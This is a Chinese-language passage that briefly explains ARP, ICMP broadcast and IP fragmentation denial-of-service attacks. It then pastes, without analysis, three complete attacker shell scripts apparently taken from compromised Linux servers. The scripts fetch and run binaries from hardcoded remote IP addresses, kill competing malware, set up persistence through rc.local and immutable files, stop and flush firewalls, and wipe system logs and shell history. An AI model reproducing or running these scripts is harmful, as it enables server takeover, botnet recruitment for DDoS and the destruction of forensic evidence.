基于ARP
ARP是无连接的协议,当收到攻击者发送来的ARP应答时。它将接收ARP应答包中所提供的信息。更新ARP缓存。因此,含有错误源地址信息的ARP请求和含有错误目标地址信息的ARP应答均会使上层应用忙于处理这种异常而无法响应外来请求,使得目标主机丧失网络通信能力。产生拒绝服务,如ARP重定向攻击。
基于ICMP
攻击者向一个子网的广播地址发送多个ICMP Echo请求数据包。并将源地址伪装成想要攻击的目标主机的地址。这样,该子网上的所有主机均对此ICMP Echo请求包作出答复,向被攻击的目标主机发送数据包,使该主机受到攻击,导致网络阻塞。
基于IP
TCP/IP中的IP数据包在网络传递时,数据包可以分成更小的片段。到达目的地后再进行合并重装。在实现分段重新组装的进程中存在漏洞,缺乏必要的检查。利用IP报文分片后重组的重叠现象攻击服务器,进而引起服务器内核崩溃。如Teardrop是基于IP的攻击。
基于应用层
例子2:apt-get install curl
yum install curl
curl http://121.40.175.22:15651/95 -o /tmp/gfty
killall -I -q Linux6 ifconf 123
killall -I -q LAdmins Admins asxper
killall -I -q g251 koiu winsx synlinshi
killall -I -q mysql sysyang ifconfigethO whoami ifconfigetho
killall -I -q gmetad cvn hanx .xdsy hssa ggu ggy gg azda .sshd bashpa
killall -I -q sshpa udevd .SSH2 .SSHH2 nhgbhhj zl pro proh DDos64 DDos32
killall -I -q dos64 dos32 sfewfesfs sfewfesfsh IptabLes tangwe IptabLex
killall -I -q .IptabLes .IptabLex 1 perl System Admins Linuxsys System32 rus
killall -I -q sql tel netstat -an ddos32_64.64 Admins koiu 315 64 udp
killall -I -q koi Chinesepoli 508 topsing weige udp
apt-get install wget
yum install wget
wget -c -O /tmp/gfty http://121.40.175.22:15651/95
chmod 0755 /tmp/gfty
/tmp/gfty
./gfty
nohup /tmp/gfty > /dev/null 2>&1 &
echo “service gfty”>>/etc/rc.local
echo “/tmp/gfty”>>/etc/rc.local
chattr +i /tmp/gfty
apt-get -y remove curl
yum -y remove curl
apt-get -y remove wget
yum -y remove wget
clear
history -c
例子3:cd /tmp
service iptables stop
rm -rf /etc/crontab
rm -rf /usr/bin/bsd-port/getty
rm -rf /usr/bin/bsd-port/*
killall -9 getty
find ./ -name “S90*” | grep -v S90single | grep -v reboot | grep -v S90halt |xargs rm -fr
ps -ef | grep -v ‘ssh’ |awk ‘{if ($3 == 1) print $2}’ | xargs kill -9
yum -y install wget
wget -c http://222.186.34.174:9655/aa
chmod 777 aa
./aa
wget -c http://222.186.34.174:9655/17230
chmod 777 17230
./17230
iptables -I INPUT -s 116.31.123.159 -j DROP
iptables -I INPUT -s 183.60.110.74 -j DROP
iptables -I INPUT -s 122.224.32.32 -j DROP
iptables -I INPUT -s 149.56.107.161 -j DROP
iptables -I INPUT -s 104.223.10.48 -j DROP
iptables -I INPUT -s 178.170.68.69 -j DROP
iptables -I INPUT -s 158.69.219.235 -j DROP
iptables -I INPUT -s 164.132.170.78 -j DROP
iptables -I INPUT -s 149.202.219.49 -j DROP
iptables -I INPUT -s 124.16.31.156 -j DROP
iptables -I INPUT -s 183.61.171.149 -j DROP
iptables -I INPUT -s 61.157.167.74 -j DROP
iptables -I INPUT -s 119.63.44.35 -j DROP
iptables -I INPUT -s 42.51.23.80 -j DROP
iptables -I INPUT -s 104.129.35.178 -j DROP
iptables -I INPUT -s 103.31.240.133 -j DROP
iptables -I INPUT -s 100.42.227.29 -j DROP
iptables -I INPUT -s 107.160.46.234 -j DROP
iptables -I INPUT -s 222.186.34.73 -j DROP
iptables -I INPUT -s 36.249.123.134 -j DROP
iptables -I INPUT -s 118.193.214.160 -j DROP
iptables -I INPUT -s 104.37.213.35 -j DROP
iptables -I INPUT -s 58.54.39.51 -j DROP
iptables -I INPUT -s 23.247.5.12 -j DROP
iptables -I INPUT -s 23.247.5.11 -j DROP
iptables -I INPUT -s 51.255.84.218 -j DROP
iptables -I INPUT -s 98.126.8.114 -j DROP
iptables -I INPUT -s 222.174.5.13 -j DROP
iptables -I INPUT -s 123.184.16.119 -j DROP
iptables -I INPUT -s 103.214.169.184 -j DROP
iptables -I INPUT -s 103.236.220.90 -j DROP
iptables -I INPUT -s 103.55.25.57 -j DROP
iptables -I INPUT -s 103.55.26.91 -j DROP
iptables -I INPUT -s 104.223.6.159 -j DROP
iptables -I INPUT -s 107.160.46.234 -j DROP
iptables -I INPUT -s 111.160.17.8 -j DROP
iptables -I INPUT -s 114.112.27.83 -j DROP
iptables -I INPUT -s 115.231.219.34 -j DROP
iptables -I INPUT -s 115.28.206.48 -j DROP
iptables -I INPUT -s 116.31.116.28 -j DROP
iptables -I INPUT -s 117.18.4.110 -j DROP
iptables -I INPUT -s 122.225.102.131 -j DROP
iptables -I INPUT -s 123.184.16.119 -j DROP
iptables -I INPUT -s 14.29.47.15 -j DROP
iptables -I INPUT -s 149.202.210.93 -j DROP
iptables -I INPUT -s 180.97.163.228 -j DROP
iptables -I INPUT -s 183.60.0.0/24 -j DROP
iptables -I INPUT -s 183.60.110.83 -j DROP
iptables -I INPUT -s 183.60.149.196 -j DROP
iptables -I INPUT -s 183.60.149.199 -j DROP
iptables -I INPUT -s 183.61.171.147 -j DROP
iptables -I INPUT -s 198.44.177.102 -j DROP
iptables -I INPUT -s 204.44.67.19 -j DROP
iptables -I INPUT -s 23.234.25.143 -j DROP
iptables -I INPUT -s 23.234.28.85 -j DROP
iptables -I INPUT -s 51.255.66.195 -j DROP
iptables -I INPUT -s 58.218.200.111 -j DROP
iptables -I INPUT -s 61.160.195.78 -j DROP
iptables -I INPUT -s 61.174.49.203 -j DROP
iptables -I INPUT -s 66.102.253.30 -j DROP
iptables -I INPUT -s 66.249.65.123 -j DROP
iptables -I INPUT -s 115.231.17.7 -j DROP
iptables -I INPUT -s 61.174.49.203 -j DROP
echo> /var/log/wtmp
echo> /root/bash_history
echo> /var/log/syslog
echo> /var/log/messages
echo> /var/log/httpd/access_log
echo> /var/log/httpd/error_log
echo> /var/log/xferlog
echo> /var/log/secure
echo> /var/log/auth.log
echo> /var/log/user.log
echo> /var/log/wtmp
echo> /var/log/lastlog
echo> /var/log/btmp
echo> /var/run/utmp
history -c
exit
来一张DDOS控制面板/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
iptables -F
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
wget -P /bin/ http://43.230.144.65/zz -c
chmod 0755 /bin/zz
nohup /bin/zz > /dev/null 2>&1 &
chattr +i /usr/bin/wget
chmod 0 /usr/libexec/openssh/sftp-server
chattr +i /usr/libexec/openssh/sftp-server
echo ‘ ‘ > /var/log/wtmp
echo ‘ ‘ > /var/log/lastlog
echo ‘ ‘ > /var/log/messages
export HISTFILE=/dev/null
rm -f /var/log/wtmp
rm -f .bash_history
history -c